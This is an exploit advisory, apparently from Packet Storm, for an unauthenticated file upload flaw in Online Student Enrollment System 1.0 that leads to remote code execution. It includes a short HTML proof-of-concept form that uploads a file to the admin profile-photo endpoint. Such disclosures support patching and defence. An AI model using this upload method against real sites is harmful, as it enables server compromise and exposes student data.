Online Student Enrollment System 1.0 Arbitrary File Upload

Type packetstorm
Reporter BKpatron
Modified 2020-06-22T00:00:00


                                            `# Exploit Title: Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload  
# Google Dork: N/A  
# Date: 2020-06-20  
# Exploit Author: BKpatron  
# Vendor Homepage:  
# Software Link:  
# Version: v1.0  
# Tested on: Win 10  
# CVE: N/A  
# Vulnerability:  
Online Student Enrollment System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution  
(RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file.  
#CSRF PoC:  
<form action="http://localhost/student_enrollment/admin/index.php?page=user-profile" method="POST" enctype="multipart/form-data">  
<input type="file" name="userphoto" required="" id="photo"><br>  
<input class="btn btn-info" type="submit" name="upphoto" value="Upload Photo">